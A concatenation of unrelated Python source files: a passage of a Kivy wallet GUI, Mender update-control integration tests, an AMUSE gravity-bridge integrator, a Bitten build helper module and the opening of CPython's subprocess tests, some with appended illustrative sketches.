def cb(permissions, grant_results: Sequence[bool]):
if not grant_results or not grant_results[0]:
self.show_error(_("Cannot save backup without STORAGE permission"))
return
# note: Clock.schedule_once is a hack so that we get called on a non-daemon thread
# (needed for WalletDB.write)
Clock.schedule_once(lambda dt: self._save_backup())
request_permissions([Permission.WRITE_EXTERNAL_STORAGE], cb)
def _save_backup(self):
new_path = self.wallet.save_backup()
if new_path:
self.show_info(_("Backup saved:") + f"\n{new_path}")
else:
self.show_error(_("Backup NOT saved. Backup directory not configured."))
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password))
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Decrypt your private key?"), show_private_key, (addr, pk_label))
def import_channel_backup(self, encrypted):
d = Question(_('Import Channel Backup?'), lambda b: self._import_channel_backup(b, encrypted))
d.open()
def _import_channel_backup(self, b, encrypted):
if not b:
return
try:
self.wallet.lnbackups.import_channel_backup(encrypted)
except Exception as e:
self.logger.exception("failed to import backup")
self.show_error("failed to import backup" + '\n' + str(e))
return
self.lightning_channels_dialog()
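# --- Illustrative sketch (not part of the original file) ---------------------
# sign_tx()/_sign_tx() and broadcast()/_broadcast_thread() above share one
# pattern: run the blocking wallet/network call on a worker thread, then hand
# the result back to the GUI thread via Clock.schedule_once. The standalone
# sketch below shows the same hand-off using only the standard library; the
# queue stands in for Kivy's Clock loop, and all names here are made up purely
# for illustration.
if __name__ == '__main__':
    import queue
    import threading

    ui_events = queue.Queue()  # plays the role of Clock.schedule_once

    def broadcast_thread_sketch(payload, on_complete):
        # Blocking work happens off the "UI" thread...
        result = payload.upper()
        # ...and only the callback invocation is queued back to the UI thread.
        ui_events.put(lambda: on_complete(True, result))

    def on_complete(ok, msg):
        print('broadcast finished:', ok, msg)

    threading.Thread(target=broadcast_thread_sketch,
                     args=('tx-bytes', on_complete)).start()
    ui_events.get()()  # the "UI" thread drains the queue and runs the callback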
|
test_update_control.py
|
#!/usr/bin/python
# Copyright 2022 Northern.tech AS
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import pytest
import subprocess
import sys
import tempfile
import time
from multiprocessing import Process
from mock_server import (
cleanup_deployment_response,
prepare_deployment_response,
setup_mock_server,
EXPIRATION_TIME,
BOOT_EXPIRATION_TIME,
)
from utils.common import put_no_sftp, cleanup_mender_state
# Map UIDs. Randomly chosen, but used throughout for consistency.
MUID = "3702f9f0-b318-11eb-a7b6-c7aece07181e"
MUID2 = "3702f9f0-b318-11eb-a7b6-c7aece07181f"
BETWEEN_EXPIRATIONS = max(EXPIRATION_TIME, BOOT_EXPIRATION_TIME) - 5
FAIL_TIME = EXPIRATION_TIME + BOOT_EXPIRATION_TIME
def start_and_ready_mender_client(connection, second_connection):
def dbus_monitor():
second_connection.run(
"dbus-monitor --system \"type='signal',interface='io.mender.Authentication1'\" > /tmp/dbus-monitor.log"
)
p = Process(target=dbus_monitor, daemon=True)
p.start()
time.sleep(0.5)
try:
connection.run("systemctl start mender-client")
timeout = 120
now = time.time()
while time.time() - now < timeout:
time.sleep(1)
output = connection.run("cat /tmp/dbus-monitor.log")
if "JwtTokenStateChange" in output.stdout.strip():
break
else:
assert (
False
), "Mender client did not broadcast JwtTokenStateChange as expected."
finally:
p.terminate()
connection.run("rm -f cat /tmp/dbus-monitor.log")
def set_update_control_map(connection, m, warn=False):
output = connection.run(
"dbus-send --system --dest=io.mender.UpdateManager --print-reply /io/mender/UpdateManager io.mender.Update1.SetUpdateControlMap string:'%s'"
% json.dumps(m),
warn=warn,
)
assert "int32 %d" % (EXPIRATION_TIME / 2) in output.stdout
def clear_update_control_maps(connection):
connection.run(
(
"for uid in %s %s; do "
+ " for priority in `seq -10 10`; do "
+ """ dbus-send --system --dest=io.mender.UpdateManager --print-reply /io/mender/UpdateManager io.mender.Update1.SetUpdateControlMap string:'{"id":"'$uid'","priority":'$priority'}';"""
+ " done;"
+ "done"
)
% (MUID, MUID2),
warn=True,
)
# Deliberately not using a constant for deployment_id. If you want something
# known, you have to pass it in yourself.
def make_and_deploy_artifact(
connection,
device_type,
deployment_id="7e49d892-d5a0-11eb-a6ff-23a7bacac256",
update_control_map=None,
):
with tempfile.NamedTemporaryFile(suffix=".mender") as artifact_file:
artifact_name = os.path.basename(artifact_file.name)[:-7]
subprocess.check_call(
[
"mender-artifact",
"write",
"module-image",
"-t",
device_type,
"-T",
"logger-update-module",
"-n",
artifact_name,
"-o",
artifact_file.name,
]
)
prepare_deployment_response(
connection,
artifact_file.name,
device_type,
artifact_name=artifact_name,
deployment_id=deployment_id,
update_control_map=update_control_map,
)
def wait_for_state(connection, state_to_wait_for):
log = []
attempts = 10
while attempts > 0:
output = connection.run(
"cat /data/logger-update-module.log 2>/dev/null || true"
).stdout.strip()
log = [line.split()[1] for line in output.split("\n") if len(line) > 0]
if state_to_wait_for in log:
break
time.sleep(6)
attempts -= 1
else:
pytest.fail(f"Could not find {state_to_wait_for} in log")
return log
class TestUpdateControl:
test_update_control_maps_cases = [
{"name": "Empty map", "case": {"maps": [{"id": MUID,}], "success": True,},},
{
"name": "Fail in ArtifactInstall_Enter",
"case": {
"maps": [
{
"id": MUID,
"states": {"ArtifactInstall_Enter": {"action": "fail",},},
}
],
"success": False,
"last_successful_state": "Download",
},
},
{
"name": "Fail in ArtifactReboot_Enter",
"case": {
"maps": [
{
"id": MUID,
"states": {"ArtifactReboot_Enter": {"action": "fail",},},
}
],
"success": False,
"last_successful_state": "ArtifactInstall",
},
},
{
"name": "Fail in ArtifactCommit_Enter",
"case": {
"maps": [
{
"id": MUID,
"states": {"ArtifactCommit_Enter": {"action": "fail",},},
}
],
"success": False,
"last_successful_state": "ArtifactVerifyReboot",
},
},
{
"name": "Pause in ArtifactInstall_Enter",
"case": {
"maps": [
{
"id": MUID,
"states": {"ArtifactInstall_Enter": {"action": "pause",},},
}
],
"success": True,
"state_before_pause": "Download",
"continue_map": {
"id": MUID,
"states": {"ArtifactInstall_Enter": {"action": "continue",},},
},
"last_successful_state": "ArtifactCommit",
},
},
{
"name": "Pause in ArtifactReboot_Enter",
"case": {
"maps": [
{
"id": MUID,
"states": {"ArtifactReboot_Enter": {"action": "pause",},},
}
],
"success": True,
"state_before_pause": "ArtifactInstall",
"continue_map": {
"id": MUID,
"states": {"ArtifactReboot_Enter": {"action": "continue",},},
},
"last_successful_state": "ArtifactCommit",
},
},
{
"name": "Pause in ArtifactCommit_Enter",
"case": {
"maps": [
{
"id": MUID,
"states": {"ArtifactCommit_Enter": {"action": "pause",},},
}
],
"success": True,
"state_before_pause": "ArtifactVerifyReboot",
"continue_map": {
"id": MUID,
"states": {"ArtifactCommit_Enter": {"action": "continue",},},
},
"last_successful_state": "ArtifactCommit",
},
},
{
"name": "Expire in ArtifactInstall_Enter",
"case": {
"maps": [
{
"id": MUID,
"states": {
"ArtifactInstall_Enter": {
"action": "pause",
"on_map_expire": "continue",
},
},
}
],
"take_at_least": EXPIRATION_TIME,
"success": True,
"last_successful_state": "ArtifactCommit",
},
},
{
"name": "Reboot and expire in ArtifactInstall_Enter",
"case": {
"maps": [
{
"id": MUID,
"states": {
"ArtifactInstall_Enter": {
"action": "pause",
"on_map_expire": "continue",
},
},
}
],
"restart_client": True,
"fail_after": BETWEEN_EXPIRATIONS,
"success": True,
"last_successful_state": "ArtifactCommit",
},
},
{
"name": "Continue, then fail in ArtifactInstall_Enter",
"case": {
"maps": [
{
"id": MUID,
"states": {
"ArtifactInstall_Enter": {
"action": "continue",
"on_action_executed": "fail",
},
},
}
],
"second_deployment": True,
"success": False,
"last_successful_state": "Download",
},
},
{
"name": "continue with higher priority",
"case": {
"maps": [
{
"id": MUID,
"states": {"ArtifactInstall_Enter": {"action": "fail",},},
},
{
"id": MUID2,
"states": {"ArtifactInstall_Enter": {"action": "continue",},},
"priority": 1,
},
],
# "continue" has lowest precedence, even if the priority is
# higher.
"success": False,
"last_successful_state": "Download",
},
},
{
"name": "force_continue with higher priority",
"case": {
"maps": [
{
"id": MUID,
"states": {"ArtifactInstall_Enter": {"action": "pause",},},
},
{
"id": MUID2,
"states": {
"ArtifactInstall_Enter": {"action": "force_continue",},
},
"priority": 1,
},
],
"success": True,
"last_successful_state": "ArtifactCommit",
},
},
{
"name": "force_continue with lower priority",
"case": {
"maps": [
{
"id": MUID,
"states": {"ArtifactCommit_Enter": {"action": "fail",},},
},
{
"id": MUID2,
"states": {
"ArtifactCommit_Enter": {"action": "force_continue",},
},
"priority": -1,
},
],
"success": False,
"last_successful_state": "ArtifactVerifyReboot",
},
},
{
"name": "Expired and purged map",
"case": {
"maps": [
{
"id": MUID,
"states": {
# Install a map which succeeds, but sets up for failure afterwards.
"ArtifactInstall_Enter": {
"action": "continue",
"on_action_executed": "fail",
},
# Then expire the map.
"ArtifactCommit_Enter": {
"action": "pause",
"on_map_expire": "continue",
},
},
}
],
# The second deployment should succeed despite the "fail" above,
# because expired maps are purged between deployments.
"second_deployment": True,
"take_at_least": EXPIRATION_TIME,
"success": True,
"last_successful_state": "ArtifactCommit",
},
},
]
@pytest.mark.min_mender_version("2.7.0")
@pytest.mark.parametrize(
"case_name,case",
[(case["name"], case["case"]) for case in test_update_control_maps_cases],
)
def test_update_control_maps(
self,
case_name,
case,
setup_board,
connection,
second_connection,
setup_mock_server,
bitbake_variables,
bitbake_path,
):
try:
start_and_ready_mender_client(connection, second_connection)
for m in case["maps"]:
set_update_control_map(connection, m)
if case.get("restart_client"):
# Restart client after map insertion in order to trigger the
# boot expiration mechanism.
connection.run("systemctl restart mender-client")
now = time.time()
make_and_deploy_artifact(
connection, bitbake_variables["MENDER_DEVICE_TYPE"]
)
connection.run("mender check-update")
log = []
pause_state_observed = 0
continue_map_inserted = False
second_deployment_done = False
PAUSE_STATE_OBSERVE_COUNT = 2
while time.time() - now <= case.get("fail_after", FAIL_TIME):
output = connection.run(
"cat /data/logger-update-module.log 2>/dev/null || true"
).stdout.strip()
log = [line.split()[1] for line in output.split("\n") if len(line) > 0]
# Check for the state before the pause state, and verify it's
# the last state (meaning the client is currently waiting before
# the next state).
if (
not continue_map_inserted
and case.get("state_before_pause")
and len(log) > 0
and log[-1] == case["state_before_pause"]
):
pause_state_observed += 1
# Verify that it stays in paused mode.
if pause_state_observed >= PAUSE_STATE_OBSERVE_COUNT:
# Now insert the map to unblock the pause.
set_update_control_map(connection, case["continue_map"])
continue_map_inserted = True
# Cleanup is the last state of a deployment
if "Cleanup" in log:
if case.get("second_deployment") and not second_deployment_done:
# When making two deployments, we assume the first one
# is successful.
assert "ArtifactFailure" not in log
connection.run("rm -f /data/logger-update-module.log")
make_and_deploy_artifact(
connection, bitbake_variables["MENDER_DEVICE_TYPE"]
)
connection.run("mender check-update")
second_deployment_done = True
else:
break
time.sleep(5)
else:
pytest.fail("Could not find Cleanup in log, did deployment not finish?")
if case.get("take_at_least"):
assert (
time.time() - now >= case["take_at_least"]
), "Deployment finished before it was supposed to!"
if case["success"]:
assert "ArtifactFailure" not in log
else:
assert "ArtifactFailure" in log
assert (
log[log.index("ArtifactFailure") - 1]
== case["last_successful_state"]
)
if case.get("state_before_pause"):
assert (
pause_state_observed >= PAUSE_STATE_OBSERVE_COUNT
), "Looks like the client did not pause!"
except:
connection.run("journalctl --unit mender-client | cat")
connection.run("journalctl --unit mender-mock-server | cat")
raise
finally:
cleanup_deployment_response(connection)
# Reset update control maps.
clear_update_control_maps(connection)
connection.run("systemctl stop mender-client")
cleanup_mender_state(connection)
connection.run("rm -f /data/logger-update-module.log")
@pytest.mark.min_mender_version("2.7.0")
def test_invalid_update_control_map(
self, setup_board, connection, second_connection, setup_mock_server
):
try:
start_and_ready_mender_client(connection, second_connection)
status = connection.run(
"""dbus-send --system --dest=io.mender.UpdateManager --print-reply /io/mender/UpdateManager io.mender.Update1.SetUpdateControlMap string:'{"not-a":"valid-map"}'""",
warn=True,
)
assert status.return_code != 0
finally:
connection.run("systemctl stop mender-client")
cleanup_mender_state(connection)
test_update_control_maps_cleanup_cases = [
{
"name": "Cleanup after success",
"case": {
"pause_map": {
"priority": 0,
"states": {"ArtifactCommit_Enter": {"action": "pause",},},
},
"pause_state": "ArtifactVerifyReboot",
"continue_map": {
"id": MUID,
"priority": 10,
"states": {
"ArtifactInstall_Enter": {"action": "fail",},
"ArtifactCommit_Enter": {"action": "force_continue",},
},
},
"expect_failure": False,
},
},
{
"name": "Cleanup after failure",
"case": {
"pause_map": {
"priority": 0,
"states": {"ArtifactCommit_Enter": {"action": "pause",},},
},
"pause_state": "ArtifactVerifyReboot",
"continue_map": {
"id": MUID,
"priority": 10,
"states": {
"ArtifactInstall_Enter": {"action": "fail",},
"ArtifactCommit_Enter": {"action": "fail",},
},
},
"expect_failure": True,
},
},
]
@pytest.mark.min_mender_version("2.7.0")
@pytest.mark.parametrize(
"case_name,case",
[
(case["name"], case["case"])
for case in test_update_control_maps_cleanup_cases
],
)
def test_update_control_map_cleanup(
self,
case_name,
case,
setup_board,
connection,
second_connection,
setup_mock_server,
bitbake_variables,
bitbake_path,
):
try:
start_and_ready_mender_client(connection, second_connection)
# First deployment sends the "pause" control map via Server API with the
# update; then once the client is paused, the map is overridden via DBus API.
# The deployment shall succeed or fail depending on the test case.
make_and_deploy_artifact(
connection,
bitbake_variables["MENDER_DEVICE_TYPE"],
deployment_id=MUID,
update_control_map=case["pause_map"],
)
connection.run("mender check-update")
wait_for_state(connection, case["pause_state"])
set_update_control_map(connection, case["continue_map"])
log = wait_for_state(connection, "Cleanup")
if case["expect_failure"]:
assert "ArtifactFailure" in log
else:
assert "ArtifactFailure" not in log
# Second deployment shall succeed
connection.run("rm -f /data/logger-update-module.log")
cleanup_deployment_response(connection)
make_and_deploy_artifact(
connection,
bitbake_variables["MENDER_DEVICE_TYPE"],
deployment_id=MUID2,
update_control_map=None,
)
connection.run("mender check-update")
log = wait_for_state(connection, "Cleanup")
assert "ArtifactFailure" not in log
except:
connection.run("journalctl --unit mender-client | cat")
connection.run("journalctl --unit mender-mock-server | cat")
raise
finally:
cleanup_deployment_response(connection)
clear_update_control_maps(connection)
connection.run("systemctl stop mender-client")
cleanup_mender_state(connection)
connection.run("rm -f /data/logger-update-module.log")
@pytest.mark.min_mender_version("2.7.0")
def test_many_state_transitions_with_update_control(
self,
setup_board,
connection,
second_connection,
setup_mock_server,
bitbake_variables,
bitbake_path,
):
"""Test whether we can make many state transitions with update control without
triggering the "too many state transitions" error."""
try:
start_and_ready_mender_client(connection, second_connection)
ucm = (
"""{
"ID": "%s",
"states": {
"ArtifactInstall_Enter": {
"action": "pause"
}
}
}"""
% MUID
)
with tempfile.TemporaryDirectory() as tmpdir:
script = os.path.join(tmpdir, "map-insert.sh")
with open(script, "w") as fd:
fd.write(
"""#!/bin/sh
while sleep 0.2; do
dbus-send --system --dest=io.mender.UpdateManager --print-reply /io/mender/UpdateManager io.mender.Update1.SetUpdateControlMap string:'%s'
done
"""
% ucm
)
put_no_sftp(script, connection, remote="/data/map-insert.sh")
# Constantly reinsert map over and over in the background, to force
# state transitions.
connection.run("systemd-run sh /data/map-insert.sh")
now = time.time()
make_and_deploy_artifact(
connection, bitbake_variables["MENDER_DEVICE_TYPE"]
)
connection.run("mender check-update")
timeout = now + 300
# Wait until we have received 100 state transitions, which is way
# more than would cause a failure.
while time.time() < timeout:
output = connection.run(
"journalctl --unit mender-client --since '%s' | grep 'State transition: mender-update-control '"
% time.strftime("%Y-%m-%d %H:%M:%S UTC", time.gmtime(now)),
warn=True,
).stdout
if len(output.split("\n")) >= 100:
break
else:
pytest.fail(
"Timed out without reaching the required number of state transitions."
)
# Just double check that we are indeed paused, as we expect.
log = wait_for_state(connection, "Download")
assert "Cleanup" not in log
# Force it to continue.
set_update_control_map(
connection,
{
"ID": MUID2,
"priority": 10,
"states": {"ArtifactInstall_Enter": {"action": "force_continue"}},
},
)
# Rest of deployment should finish successfully.
log = wait_for_state(connection, "Cleanup")
assert "ArtifactFailure" not in log
except:
connection.run("journalctl --unit mender-client | cat")
connection.run("journalctl --unit mender-mock-server | cat")
raise
finally:
connection.run("pkill -f map-insert.sh", warn=True)
cleanup_deployment_response(connection)
# Reset update control maps.
clear_update_control_maps(connection)
connection.run("systemctl stop mender-client")
cleanup_mender_state(connection)
connection.run("rm -f /data/logger-update-module.log")
|
fast.py
|
# issues:
# - for now, units in si
# - a common coordinate system is used for all systems
# - sync of systems should be checked
# - timestepping: adaptive dt?
from amuse.units import units
from amuse.units.quantities import zero
import threading
from amuse import datamodel
def radius_or_hsmooth(parts):
d=set(dir(parts))
if "radius" in d:
return parts.radius
else:
if "h_smooth" in d:
return parts.h_smooth
else:
print d
raise Exception
def potential_energy(system, get_potential):
parts=system.particles.copy()
pot=get_potential(parts.radius,parts.x,parts.y,parts.z)
return (pot*parts.mass).sum()/2
def kick_system(system, get_gravity, dt):
parts=system.particles.copy()
ax,ay,az=get_gravity(parts.radius,parts.x,parts.y,parts.z)
parts.vx=parts.vx+dt*ax
parts.vy=parts.vy+dt*ay
parts.vz=parts.vz+dt*az
# parts.copy_values_of_state_attributes_to(system.particles)
channel = parts.new_channel_to(system.particles)
channel.copy_attributes(["vx","vy","vz"])
class FAST(object):
def __init__(self,verbose=False,timestep=None):
"""
verbose indicates whether to output some run info
"""
self.systems=set()
self.partners=dict()
self.time_offsets=dict()
self.time=0. | units.s
self.do_sync=dict()
self.verbose=verbose
self.timestep=timestep
def set_timestep(self,timestep):
self.timestep=timestep
def add_system(self, interface, partners=set(),do_sync=True):
"""
add a system to bridge integrator
"""
if hasattr(interface,"model_time"):
self.time_offsets[interface]=(self.time-interface.model_time)
else:
self.time_offsets[interface]=0.
self.systems.add(interface)
for p in partners:
if not hasattr(interface,"get_gravity_at_point"):
return -1
self.partners[interface]=partners
self.do_sync[interface]=do_sync
return 0
def evolve_model(self,tend):
"""
evolve the combined system to tend; self.timestep fixes the step size
"""
timestep=self.timestep
if timestep is None:
timestep=tend-self.time
first=True
while self.time < (tend-timestep/2.):
if first:
self.kick_systems(timestep/2.)
first=False
else:
self.kick_systems(timestep)
self.drift_systems(self.time+timestep)
self.time=self.time+timestep
if not first:
self.kick_systems(timestep/2.)
return 0
def synchronize_model(self):
"""
explicitly synchronize all components
"""
for x in self.systems:
if hasattr(x,"synchronize_model"):
if(self.verbose): print x.__class__.__name__,"is synchronizing",
x.synchronize_model()
if(self.verbose): print ".. done"
def get_potential_at_point(self,radius,x,y,z):
err=0
pot=0.*radius
for system in self.systems:
_pot,err=system.get_potential_at_point(radius,x,y,z)
if err != 0:
break
pot=pot+_pot
return pot,err
def get_gravity_at_point(self,radius,x,y,z):
err=0
ax=0.*radius
ay=0.*radius
az=0.*radius
for system in self.systems:
_ax,_ay,_az,err=system.get_gravity_at_point(radius,x,y,z)
if err != 0:
break
ax=ax+_ax
ay=ay+_ay
az=az+_az
return ax,ay,az,err
@property
def potential_energy(self):
Ep=zero
for x in self.systems:
Ep+=x.potential_energy
if hasattr(x,"particles"):
for y in self.partners[x]:
Ep+=potential_energy(x,y.get_potential_at_point)
return Ep
@property
def kinetic_energy(self):
Ek=zero
for x in self.systems:
Ek+=x.kinetic_energy
return Ek
@property
def thermal_energy(self):
Eth=zero
for x in self.systems:
if hasattr(x,'thermal_energy'):
Eth+=x.thermal_energy
return Eth
@property
def model_time(self):
return self.time
@property
def particles(self):
arr=[]
for x in self.systems:
if hasattr(x,"particles"):
arr.append(x.particles)
return datamodel.ParticlesSuperset(arr)
@property
def gas_particles(self):
arr=[]
for x in self.systems:
if hasattr(x,"gas_particles"):
arr.append(x.gas_particles)
return datamodel.ParticlesSuperset(arr)
# 'private' functions
def drift_systems(self,tend):
threads=[]
for x in self.systems:
if hasattr(x,"evolve_model"):
offset=self.time_offsets[x]
if(self.verbose):
print "evolving", x.__class__.__name__,
threads.append(threading.Thread(target=x.evolve_model, args=(tend-offset,)) )
for x in threads:
x.start()
for x in threads:
x.join()
if(self.verbose):
print ".. done"
return 0
def kick_systems(self,dt):
for x in self.systems:
if self.do_sync[x]:
if hasattr(x,"synchronize_model"):
if(self.verbose): print x.__class__.__name__,"is synchronizing",
x.synchronize_model()
if(self.verbose): print ".. done"
for x in self.systems:
if hasattr(x,"particles"):
for y in self.partners[x]:
if x is not y:
if(self.verbose): print x.__class__.__name__,"receives kick from",y.__class__.__name__,
kick_system(x,y.get_gravity_at_point,dt)
if(self.verbose): print ".. done"
return 0
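# --- Illustrative sketch (not part of the original module) -------------------
# evolve_model() above applies a kick-drift-kick split: a half-step velocity
# kick on the first pass, full kicks between the drifts, and a closing half
# kick after the loop. The self-contained snippet below applies the identical
# stepping to a 1D harmonic oscillator (acceleration = -x) so the scheme can
# be run without AMUSE; the toy problem and numbers are made up for
# illustration only.
if __name__ == "__main__":
    x, v = 1.0, 0.0                    # initial position and velocity
    t, tend, dt = 0.0, 10.0, 0.01
    first = True
    while t < tend - dt / 2.0:
        # kick: half a step the first time through, a full step afterwards
        v += (0.5 * dt if first else dt) * (-x)
        first = False
        x += dt * v                    # drift
        t += dt
    if not first:
        v += 0.5 * dt * (-x)           # closing half kick
    # the energy should stay close to its initial value of 0.5
    print("x=%.4f  v=%.4f  energy=%.6f" % (x, v, 0.5 * (v * v + x * x)))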
|
api.py
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2005-2007 Christopher Lenz <cmlenz@gmx.de>
# Copyright (C) 2007-2010 Edgewall Software
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://bitten.edgewall.org/wiki/License.
"""Functions and classes used to simplify the implementation recipe commands."""
import logging
import fnmatch
import os
import shlex
import time
import subprocess
import sys
log = logging.getLogger('bitten.build.api')
__docformat__ = 'restructuredtext en'
class BuildError(Exception):
"""Exception raised when a build fails."""
class TimeoutError(Exception):
"""Exception raised when the execution of a command times out."""
def _encode(text):
"""Encode input for call. Input must be unicode or utf-8 string."""
if not isinstance(text, unicode):
text = unicode(text, 'utf-8')
# sys.stdin.encoding might be None (if stdin is directed from a file)
# sys.stdin.encoding might be missing (if it is a StringIO object)
encoding = sys.getfilesystemencoding() or \
getattr(sys.stdin, 'encoding', None) or 'utf-8'
return text.encode(encoding, 'replace')
def _decode(text):
"""Decode output from call."""
try:
return text.decode('utf-8')
except UnicodeDecodeError:
# sys.stdout.encoding might be None (if stdout is directed to a file)
# sys.stdout.encoding might be missing (if it is a StringIO object)
encoding = getattr(sys.stdout, 'encoding', None) or 'utf-8'
return text.decode(encoding, 'replace')
class CommandLine(object):
"""Simple helper for executing subprocesses."""
def __init__(self, executable, args, input=None, cwd=None, shell=False):
"""Initialize the CommandLine object.
:param executable: the name of the program to execute
:param args: a list of arguments to pass to the executable
:param input: string or file-like object containing any input data for
the program
:param cwd: the working directory to change to before executing the
command
:param shell: whether to run the command through the shell
"""
self.executable = executable
self.arguments = [_encode(arg) for arg in args]
self.input = input
self.cwd = cwd
if self.cwd:
assert os.path.isdir(self.cwd)
self.shell = shell
self.returncode = None
def execute(self, timeout=None):
"""Execute the command, and return a generator for iterating over
the output written to the standard output and error streams.
:param timeout: number of seconds before the external process
should be aborted (not supported on Windows without
``subprocess`` module / Python 2.4+)
"""
from threading import Thread
from Queue import Queue, Empty
def reader(pipe, pipe_name, queue):
while pipe and not pipe.closed:
line = pipe.readline()
if line == '':
break
queue.put((pipe_name, line))
if not pipe.closed:
pipe.close()
def writer(pipe, data):
if data and pipe and not pipe.closed:
pipe.write(data)
if not pipe.closed:
pipe.close()
args = [self.executable] + self.arguments
try:
p = subprocess.Popen(args, bufsize=1, # Line buffered
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=(self.cwd or None),
shell=self.shell,
universal_newlines=True,
env=None)
except Exception, e:
raise BuildError('Error executing %s: %s %s' % (args,
e.__class__.__name__, str(e)))
log.debug('Executing %s, (pid = %s, timeout = %s)', args, p.pid, timeout)
if self.input:
if isinstance(self.input, basestring):
in_data = self.input
else:
in_data = self.input.read()
else:
in_data = None
queue = Queue()
limit = timeout and timeout + time.time() or 0
pipe_in = Thread(target=writer, args=(p.stdin, in_data))
pipe_out = Thread(target=reader, args=(p.stdout, 'stdout', queue))
pipe_err = Thread(target=reader, args=(p.stderr, 'stderr', queue))
pipe_err.start(); pipe_out.start(); pipe_in.start()
while True:
if limit and limit < time.time():
if hasattr(p, 'kill'): # Python 2.6+
log.debug('Killing process.')
p.kill()
raise TimeoutError('Command %s timed out' % self.executable)
if p.poll() != None and self.returncode == None:
self.returncode = p.returncode
try:
name, line = queue.get(block=True, timeout=.01)
line = line and _decode(line.rstrip().replace('\x00', ''))
if name == 'stderr':
yield (None, line)
else:
yield (line, None)
except Empty:
if self.returncode != None:
break
pipe_out.join(); pipe_in.join(); pipe_err.join()
log.debug('%s exited with code %s', self.executable,
self.returncode)
class FileSet(object):
"""Utility class for collecting a list of files in a directory that match
given name/path patterns."""
DEFAULT_EXCLUDES = ['CVS/*', '*/CVS/*', '.svn/*', '*/.svn/*',
'.DS_Store', 'Thumbs.db']
def __init__(self, basedir, include=None, exclude=None):
"""Create a file set.
:param basedir: the base directory for all files in the set
:param include: a list of patterns that define which files should be
included in the set
:param exclude: a list of patterns that define which files should be
excluded from the set
"""
self.files = []
self.basedir = basedir
self.include = []
if include is not None:
self.include = shlex.split(include)
self.exclude = self.DEFAULT_EXCLUDES[:]
if exclude is not None:
self.exclude += shlex.split(exclude)
for dirpath, dirnames, filenames in os.walk(self.basedir):
dirpath = dirpath[len(self.basedir) + 1:]
for filename in filenames:
filepath = nfilepath = os.path.join(dirpath, filename)
if os.sep != '/':
nfilepath = nfilepath.replace(os.sep, '/')
if self.include:
included = False
for pattern in self.include:
if fnmatch.fnmatchcase(nfilepath, pattern) or \
fnmatch.fnmatchcase(filename, pattern):
included = True
break
if not included:
continue
excluded = False
for pattern in self.exclude:
if fnmatch.fnmatchcase(nfilepath, pattern) or \
fnmatch.fnmatchcase(filename, pattern):
excluded = True
break
if not excluded:
self.files.append(filepath)
def __iter__(self):
"""Iterate over the names of all files in the set."""
for filename in self.files:
yield filename
def __contains__(self, filename):
"""Return whether the given file name is in the set.
:param filename: the name of the file to check
"""
return filename in self.files
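# --- Illustrative sketch (not part of the original module) -------------------
# FileSet collects matching relative paths once, at construction time, from
# whitespace-separated include/exclude patterns (CVS/.svn metadata is excluded
# by default), while CommandLine.execute() yields a stream of
# (stdout_line, stderr_line) tuples as the subprocess runs. A minimal usage
# sketch with made-up patterns, run against the current directory:
if __name__ == '__main__':
    sources = FileSet('.', include='*.py doc/*.txt', exclude='build/*')
    for filename in sources:
        print(filename)
    print('api.py tracked: %r' % ('api.py' in sources))

    hello = CommandLine(sys.executable, ['-c', 'print("hello from the build")'])
    for out, err in hello.execute(timeout=30):
        if out is not None:
            print(out)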
|
test_subprocess.py
|
import unittest
from unittest import mock
from test import support
import subprocess
import sys
import platform
import signal
import io
import itertools
import os
import errno
import tempfile
import time
import selectors
import sysconfig
import select
import shutil
import threading
import gc
import textwrap
from test.support import FakePath
try:
import ctypes
except ImportError:
ctypes = None
else:
import ctypes.util
try:
import _testcapi
except ImportError:
_testcapi = None
if support.PGO:
raise unittest.SkipTest("test is not helpful for PGO")
mswindows = (sys.platform == "win32")
#
# Depends on the following external programs: Python
#
if mswindows:
SETBINARY = ('import msvcrt; msvcrt.setmode(sys.stdout.fileno(), '
'os.O_BINARY);')
else:
SETBINARY = ''
NONEXISTING_CMD = ('nonexisting_i_hope',)
# Ignore errors that indicate the command was not found
NONEXISTING_ERRORS = (FileNotFoundError, NotADirectoryError, PermissionError)
class BaseTestCase(unittest.TestCase):
def setUp(self):
# Try to minimize the number of children we have so this test
# doesn't crash on some buildbots (Alphas in particular).
support.reap_children()
def tearDown(self):
for inst in subprocess._active:
inst.wait()
subprocess._cleanup()
self.assertFalse(subprocess._active, "subprocess._active not empty")
self.doCleanups()
support.reap_children()
def assertStderrEqual(self, stderr, expected, msg=None):
# In a debug build, stuff like "[6580 refs]" is printed to stderr at
# shutdown time. That frustrates tests trying to check stderr produced
# from a spawned Python process.
actual = support.strip_python_stderr(stderr)
# strip_python_stderr also strips whitespace, so we do too.
expected = expected.strip()
self.assertEqual(actual, expected, msg)
class PopenTestException(Exception):
pass
class PopenExecuteChildRaises(subprocess.Popen):
"""Popen subclass for testing cleanup of subprocess.PIPE filehandles when
_execute_child fails.
"""
def _execute_child(self, *args, **kwargs):
raise PopenTestException("Forced Exception for Test")
class ProcessTestCase(BaseTestCase):
def test_io_buffered_by_default(self):
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
self.assertIsInstance(p.stdin, io.BufferedIOBase)
self.assertIsInstance(p.stdout, io.BufferedIOBase)
self.assertIsInstance(p.stderr, io.BufferedIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_io_unbuffered_works(self):
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, bufsize=0)
try:
